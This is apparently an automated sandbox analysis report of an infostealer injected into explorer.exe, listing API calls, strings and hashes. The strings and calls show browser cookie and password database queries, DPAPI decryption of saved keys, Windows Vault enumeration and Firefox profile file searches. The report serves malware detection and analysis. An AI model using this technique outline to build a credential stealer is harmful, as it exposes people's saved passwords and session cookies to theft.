Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: e3a068c544d54274b2f691d69e2d0b76757b6d9d853b28fb5bc8ff180a56102b
Instruction ID: 86820fad2c10ce9afb99b460416d3893d3adf1e27c383c3e05219b19a2beb8e7
Opcode Fuzzy Hash: e3a068c544d54274b2f691d69e2d0b76757b6d9d853b28fb5bc8ff180a56102b
Instruction Fuzzy Hash: 02316931618B4C8FDB64EF68D448BAA77E1FBE8311F10466E984ED7264DE30D9458B81

Function 01211980 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 012119D0: RtlCreateHeap.NTDLL ref: 01211AE7

SleepEx.KERNEL32(?,?,?,?,?,?,?,01211973), ref: 012119A0

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction ID: c050d20926a3cc092cf1a722e3d0d9f9fad53c8b6fe41417bd93d614ebcc3ff1
Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction Fuzzy Hash: A3E04814734A0D4BDB94FB79948473C65E2DBF8150F541579672DC618DD834C8608312

Analysis Process: icgfugfPID: 7700, Parent PID: 1044COMMON

Executed Functions

Function 00F60C20 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

tP^q, xrefs: 00F60CE7

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID: tP^q
API String ID: 0-2862610199
Opcode ID: 3f6d7c6bc866c9806c4e4a7f67f6327d1db1db5ed772dc933aa648e87257d4a5
Instruction ID: bc9c48053727b0918433597c8f1dde88dd1be7ee29bd36ba95aa7fe450957d0c
Opcode Fuzzy Hash: 3f6d7c6bc866c9806c4e4a7f67f6327d1db1db5ed772dc933aa648e87257d4a5
Instruction Fuzzy Hash: 063128757016118FCB49AB38D45882D7BE2EF8A72636104B8E50ACF3B5DE36DC42CB91

Function 00F60D58 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

8bq, xrefs: 00F60D75

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 569e619e77ccc29a9c6c11bb52a21d64b5fb3a9f2d527c0a25d8aef8e6f02c45
Instruction ID: 158c3cec2b94615e7214818dc8711267bac6912cbba7f8d7f34b32415cbf20a7
Opcode Fuzzy Hash: 569e619e77ccc29a9c6c11bb52a21d64b5fb3a9f2d527c0a25d8aef8e6f02c45
Instruction Fuzzy Hash: 24F02EB42162409FC702E7ACE4556657BD0EF89315710C5B9E14D8F3A7DF205D0797D1

Function 00F60D68 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

8bq, xrefs: 00F60D75

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 02f46b871750f814bd9143ffa0f7e4034e62921dee90e3b8c1cad85b7d71fcaf
Instruction ID: 1a10f4a3c56cd599c4e0b5766d646048db1da3895732014e93eba8d205a0f80d
Opcode Fuzzy Hash: 02f46b871750f814bd9143ffa0f7e4034e62921dee90e3b8c1cad85b7d71fcaf
Instruction Fuzzy Hash: 85E0D8742202008FC601FBACE440B6AB7D9EFC8315B008478E10D8F395DF30AD019BD0

Function 00F60848 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95553d7dd82da63b8f9a9706969c6a49ea3ee2708a512b9d5952f594b80d013d
Instruction ID: 053fa20647a65b58a1474245a4cbaab97fd566cc1324be76bd48edc6240bc05a
Opcode Fuzzy Hash: 95553d7dd82da63b8f9a9706969c6a49ea3ee2708a512b9d5952f594b80d013d
Instruction Fuzzy Hash: 1481EF30A003049FDB05EBB8D8446AEB7F2EB88311F24C569E409DB356DF79AD46CB91

Function 00F6092D Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e30daab5bed98d79e88b17bf4989eafc6c905a84f3c6f0e7789f527fdb1d129
Instruction ID: 998c65d4ccc88a3308e88092f47d9e206171d21332c7b636188f94e128a5bc42
Opcode Fuzzy Hash: 0e30daab5bed98d79e88b17bf4989eafc6c905a84f3c6f0e7789f527fdb1d129
Instruction Fuzzy Hash: 5E215930B002098FEB04ABB8D54876DB7E2FFC8715F208468D849DB355DF799C828B92

Function 00F60E18 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8993f1cd31383b367c293399c76544685466b99aa104f4ce6ed6413d5c6852eb
Instruction ID: ba69a912c6c3de3a17a08f3d24e2a853fb9c4652f9241f772641cac2edc0bf51
Opcode Fuzzy Hash: 8993f1cd31383b367c293399c76544685466b99aa104f4ce6ed6413d5c6852eb
Instruction Fuzzy Hash: 5DF090792282449FCB46ABA4F4849653F71EF4972172041A5E90CCF327DB25DC45EB41

Function 00F60D21 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3473de7242e109c8553a1ecbdeeab7d0fefe06aee71fdf961a9d5510d90d464f
Instruction ID: cea12093528bff740cd2ebc6c02d30a04501af19a99d2c9853d3f6d6e8fa2a10
Opcode Fuzzy Hash: 3473de7242e109c8553a1ecbdeeab7d0fefe06aee71fdf961a9d5510d90d464f
Instruction Fuzzy Hash: 17E0C2B51583848FCB425B70E4695613F70EB4B210B2200E9DA0C8F263DA349C46CB01

Function 00F60D30 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2199321396.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f60000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f5f138fa4584c3556b068ee8cd23851e0df504f4d90f14630ecf18233f0f46
Instruction ID: 9c1939302144d33f55596422a270fabaf29991f2d0ddb876a91cd11bf1c2274a
Opcode Fuzzy Hash: 89f5f138fa4584c3556b068ee8cd23851e0df504f4d90f14630ecf18233f0f46
Instruction Fuzzy Hash: DCD01238224208DFCB00AF24F488C253BB9FB88A2031040A4EC0D8B32ACB35EC81CA40

Analysis Process: explorer.exePID: 7272, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	50.9%
Signature Coverage:	22.1%
Total number of Nodes:	782
Total number of Limit Nodes:	83

Executed Functions

Function 02793717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 02793778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02793782
DeleteFileW.KERNELBASE(00000000), ref: 02793789
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02793794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0279383B
RtlZeroMemory.NTDLL(?,00000040), ref: 02793870
lstrlen.KERNEL32(?,?,?,?,?), ref: 0279398B
lstrlen.KERNEL32(00000000), ref: 0279399A
wsprintfA.USER32 ref: 027939F1
lstrlen.KERNEL32(00000000,?,?), ref: 027939FD
lstrcat.KERNEL32(00000000,?), ref: 02793A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02793A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02793B13
lstrlen.KERNEL32(00000000), ref: 02793B22
wsprintfA.USER32 ref: 02793B79
lstrlen.KERNEL32(00000000), ref: 02793B85
lstrcat.KERNEL32(00000000,?), ref: 02793BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02793BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02793C16

Strings

SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 027937C3
0, xrefs: 02793828
v1, xrefs: 02793821
FALSE, xrefs: 027939BC, 02793B3C
COOKIES, xrefs: 02793BE8, 02793BED, 02793BF6
%sTRUE%s%s%s%s%s, xrefs: 027939EB, 02793B73
TRUE, xrefs: 027939C9, 02793B51

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: d95f6ebb70097ef85f5dda044b72c21990e7fafe1f99ea41c9814e8a4ccd6022
Instruction ID: f4edbed3c3fa33ebb825049afefb2175548b4ed9c0e026c977d0d6e7918a1e6c
Opcode Fuzzy Hash: d95f6ebb70097ef85f5dda044b72c21990e7fafe1f99ea41c9814e8a4ccd6022
Instruction Fuzzy Hash: 52E18F716083429FDB16DF24E884F2FBBEAEF89758F04886CF59596250DB35C805CB62

Function 02792198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 027921AF
GetVersionExW.KERNEL32(?), ref: 027921BE
LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 027921E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0279220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02792214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02792220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0279222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02792236
RtlCompareMemory.NTDLL(?,027F1110,00000010), ref: 027922E8
RtlCompareMemory.NTDLL(?,027F1110,00000010), ref: 0279236C

Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 027923FE
FreeLibrary.KERNELBASE(00000000), ref: 02792493

Strings

VaultFree, xrefs: 0279222C
VaultEnumerateItems, xrefs: 02792216
VaultCloseVault, xrefs: 0279220C
VaultOpenVault, xrefs: 02792204
Internet Explorer, xrefs: 027923F8
VaultGetItem, xrefs: 02792222
vaultcli.dll, xrefs: 027921E3

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: b6062a6e8786bd2df0c05f9c66f5952daf04c918a28752a95a9f884e2bff72fc
Instruction ID: b717e439f1dd227b8c225e32b4d4f7a26018c252c0a42a32ce1d4c7d043be54e
Opcode Fuzzy Hash: b6062a6e8786bd2df0c05f9c66f5952daf04c918a28752a95a9f884e2bff72fc
Instruction Fuzzy Hash: AB919E71A08341AFDB14EF65D844A2FBBEABFD9704F40482DF98697261EB71D801CB52

Function 02793098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 027930F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02793103
DeleteFileW.KERNELBASE(00000000), ref: 0279310A
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02793115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 027931A4
RtlZeroMemory.NTDLL(?,00000040), ref: 027931D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 027932DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0279339C

Strings

v1, xrefs: 0279318A
0, xrefs: 02793191
SELECT origin_url,username_value,password_value FROM logins, xrefs: 02793136
@, xrefs: 027931F1

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: 6e4598cd0e3a7ddd40b338b26a2acad1bc6f9b6dbb336abd791b76997d5c65c4
Instruction ID: 9d1f1040ad2cf95a349c35f8f017869b474ee6e2b03000fedce5898c6ee0e6d6
Opcode Fuzzy Hash: 6e4598cd0e3a7ddd40b338b26a2acad1bc6f9b6dbb336abd791b76997d5c65c4
Instruction Fuzzy Hash: 2E91AC71608342ABDB11DF24E848F7FBBEAAFC9748F44496CF48996250DB35D804CB22

Function 02793ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02791000: GetProcessHeap.KERNEL32(00000008,?,027911C7,?,?,00000001,00000000,?), ref: 02791003
Part of subcall function 02791000: RtlAllocateHeap.NTDLL(00000000), ref: 0279100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02793F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02793F16
lstrcmpiW.KERNEL32(?,027E62CC), ref: 02793F38
lstrcmpiW.KERNEL32(?,027E62D0), ref: 02793F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02793F69
lstrcmpiW.KERNEL32(?,Local State), ref: 02793F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02793F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02793FB5
FindClose.KERNELBASE(00000000), ref: 02793FC4

Strings

*.*, xrefs: 02793F01
Local State, xrefs: 02793F78

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: 422178384343868caa283198a56d7fdfcabf565dff4d2166b3df8a3767254023
Instruction ID: 8988df34ebae4ea4267a0183cfd436a75afd31cae9828a0be9058a072bbc83f0
Opcode Fuzzy Hash: 422178384343868caa283198a56d7fdfcabf565dff4d2166b3df8a3767254023
Instruction Fuzzy Hash: B521D330640305ABEF11B634AC0CF3B777EDB9A715F044969F817CA180EB7598188771

Function 02792B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 02792B3D
lstrcmpiW.KERNEL32(?,027E62CC), ref: 02792B63
lstrcmpiW.KERNEL32(?,027E62D0), ref: 02792B7B

Part of subcall function 027919B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02792CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027919C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 02792BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02792C16
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02792C43
FindClose.KERNELBASE(00000000), ref: 02792C52

Strings

cookies.sqlite, xrefs: 02792C10
\*.*, xrefs: 02792B15
logins.json, xrefs: 02792BE1

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: 5163255bf08b01f2787ed51ab6ef09c255a67b50a20ce4aa8ae671cb9a6664b8
Instruction ID: c427b6149df8457c0a9a30276191b294926454f90bb12e54c24b0791076f6a5b
Opcode Fuzzy Hash: 5163255bf08b01f2787ed51ab6ef09c255a67b50a20ce4aa8ae671cb9a6664b8
Instruction Fuzzy Hash: 4A31E630704352ABDF06FB307858A3F33DFAB88714B44492CED4AD7242EB39C9119A61

Function 02791D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027919B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02792CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 027919C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02791DA9
lstrcmpiW.KERNEL32(?,027E62CC), ref: 02791DCF
lstrcmpiW.KERNEL32(?,027E62D0), ref: 02791DE7
lstrcmpiW.KERNEL32(?,?), ref: 02791E62

Part of subcall function 02791CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02792C27), ref: 02791D02
Part of subcall function 02791CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02791D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 02791E94
FindClose.KERNELBASE(00000000), ref: 02791EA3

Part of subcall function 02791953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02792F0C), ref: 02791973
Part of subcall function 02791953: lstrlenW.KERNEL32(027E6564,?,?,02792F0C), ref: 02791978
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,?,?,?,02792F0C), ref: 02791990
Part of subcall function 02791953: lstrcatW.KERNEL32(00000000,027E6564,?,?,02792F0C), ref: 02791994

Strings

*.*, xrefs: 02791D8B
\*.*, xrefs: 02791D79

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 5060d39a677e1aa79d00479d16f0a010a1319908bc5359ce03be722e546d829c
Instruction ID: 4faf6305cbbacb0350ef63ea8c21ca6ececc6fd177f5665a701c2fd9f4e32d20
Opcode Fuzzy Hash: 5060d39a677e1aa79d00479d16f0a010a1319908bc5359ce03be722e546d829c
Instruction Fuzzy Hash: 5631BA307043439BDF11EB35A888A7F77EE9FD8751F444A29E94E87240EB75C825C661

Function 02793E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02791B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02792893,00000000,00000000,00000000,?), ref: 02791B82
Part of subcall function 02791B6A: CloseHandle.KERNELBASE(00000000), ref: 02791B8F

Part of subcall function 02791C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02793E1E,00000000,?,02793FA8), ref: 02791C46
Part of subcall function 02791C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02793FA8), ref: 02791C56
Part of subcall function 02791C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02793FA8), ref: 02791C76
Part of subcall function 02791C31: CloseHandle.KERNEL32(00000000,?,02793FA8), ref: 02791C91

Part of subcall function 02792FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02793E30,00000000,00000000,?,02793FA8), ref: 02792FC1
Part of subcall function 02792FB1: lstrlen.KERNEL32("encrypted_key":",?,02793FA8), ref: 02792FCE
Part of subcall function 02792FB1: StrStrIA.SHLWAPI("encrypted_key":",027E692C,?,02793FA8), ref: 02792FDD

Part of subcall function 0279123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02793E4B,00000000), ref: 0279124A
Part of subcall function 0279123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791268
Part of subcall function 0279123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02791295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 02793E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02793E9E

Strings

DPAP, xrefs: 02793E52
IDPAP, xrefs: 02793E6E, 02793E72
DPAP, xrefs: 02793E5A
, xrefs: 02793EA8

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: 2d6b0031a3762b07c655d236607a56ceda146241935e470b4780d0ba06078af6
Instruction ID: 6ecf21fc10dfb6d655da44bece24983cc7161f53d517d38a21912250d0e9bdf3
Opcode Fuzzy Hash: 2d6b0031a3762b07c655d236607a56ceda146241935e470b4780d0ba06078af6
Instruction Fuzzy Hash: 3021D8726043469BDF11EE69A880A7FB3EEAF84704F850A6DF845D7200EF74CD058B92

Function 027F9247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2248826893.00000000027F7000.00000040.80000000.00040000.00000000.sdmp, Offset: 027F7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_27f7000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff8911654aaece41d672be3b9d034ab7d3e1958166fe9fbd3ff54777f1ac0d8
Instruction ID: 2101b139fd82adbe593a7862c2b7b74297dbb68fe316514cc1bfd2cde2007c19
Opcode Fuzzy Hash: 2ff8911654aaece41d672be3b9d034ab7d3e1958166fe9fbd3ff54777f1ac0d8
Instruction Fuzzy Hash: 4DA118B291C752DBD7618E78DCC07B1BBA5EF52224B1C066DCBE19B3C2E760940AC761

Function 02794B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02791162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0279116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02794BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 02794BBF

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: 5029dd4b673de76b29bff4a40dfb5357f590ada78a6e24b0e18f9044d0ee5b7c
Instruction ID: da821c5623a765de954fd07da741f91c031eb7b5bdb20cf810abd3ba06094e20
Opcode Fuzzy Hash: 5029dd4b673de76b29bff4a40dfb5357f590ada78a6e24b0e18f9044d0ee5b7c
Instruction Fuzzy Hash: 4EE09231945310A7CE597B34BC2CB4F3B9E9B95361F10C914A15996080CB3144118A60

Function 02791011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02791162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0279116F

GetProcessHeap.KERNEL32(00000000,00000000,?,02791A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2), ref: 02791020
RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02791AE2,PortNumber,00000000,00000000), ref: 02791027

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: ad00dd909b41c04cf0b6d28f9682c90bbfdd9a807d897bd098537ecb8e2ec5ef
Instruction ID: 59ab2d199bc77c416ad18ac8c0c61bdfea405270d746968db6a56be78f8744ef
Opcode Fuzzy Hash: ad00dd909b41c04cf0b6d28f9682c90bbfdd9a807d897bd098537ecb8e2ec5ef
Instruction Fuzzy Hash: A3C04C71C85361A6CE6127A8790CBCA2B1EDF5D266F454881B509AB145CA7688618AB0

Function 02796512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(027F20A4,00000001,00000000,0000000A,027E3127,027928DA,00000000,?), ref: 0279BFFC

Memory Dump Source

Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2791000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: e454a1a7d97b39aafa3be3b0247a669200676ca88db3109f2f7157256d6d16a8
Instruction ID: be2b4584fde0ae7dc142b74830771b6f2c3ae928a9a967755dfcd199741174d5
Opcode Fuzzy Hash: e454a1a7d97b39aafa3be3b0247a669200676ca88db3109f2f7157256d6d16a8
Instruction Fuzzy Hash: E0E06D71788310B1FE9133B97C0BF0A1A4E4B80B00F904B11B719A82C8DB9580401826

Function 02793C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
